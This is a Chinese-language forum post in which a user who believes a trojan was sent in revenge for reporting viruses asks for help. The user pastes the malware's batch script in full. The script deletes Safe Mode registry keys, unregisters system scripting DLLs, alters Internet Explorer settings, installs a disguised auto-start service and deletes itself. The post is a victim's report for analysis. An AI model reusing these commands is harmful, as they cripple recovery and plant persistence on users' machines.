举报病毒木马被报复了,高手帮忙看下
说实话,我在卡卡论坛也混了不少时间了,就没碰见过这么NB的病毒
说也邪门了,前几天出于安全的需要,本来是开着360的,后来就装了一个诺顿考虑到瑞星杀毒要好一点,
又装上了瑞星正版杀毒和卡卡助手,360就没开启,
谁知道昨天刚关了360监控,今天病毒又来了,也太邪门了,以前一直开360也没见过报毒,我把360一关,装上瑞星和卡卡,接着木马就来了,而且木马在40个在线扫描引擎居然只有4个报毒的,而且其中就有360推荐的NOD32,我不知道这是巧合还是怎么回事,我不管是怎么回事,我先杀毒再说吧,我就发了这样一个帖子
http://bbs.ikaka.com/showtopic-8584803.aspx 咱们论坛的朋友很热心,瑞星的客服服务也很好
今天上网没上任何小网站,我把所有监控都开了,还是没能挡住木马的下载,强烈怀疑是出于报复性质的木马,
恰好我的机器里面有暴风影音和迅雷
系统报错,并且木马破坏了组件注册:病毒批处理如下:
StreamLink.bat
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s itss.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /s jscript.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s scrrun.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s shimgvw.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}" /v "Compatibility Flags" /t REG_SZ /d 00000400 /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s vbscript.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
*
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
regsvr32.exe /u /s scrrun.dll
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe ADD "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}" /v "Compatibility Flags" /t REG_SZ /d 00000400 /F
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
sc.exe create ccosmSrv BinPath= "C:\Program Files\StormII\stormSrv.exe /asservice" type= own type= interact start= auto DisplayName= InputXpath
sc.exe description ccosmSrv "Contrl Center of Storm Media"
del %0
exit
jxbsqdqmnwztunjgadufbu迅雷浏览器高级特性支持模块
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
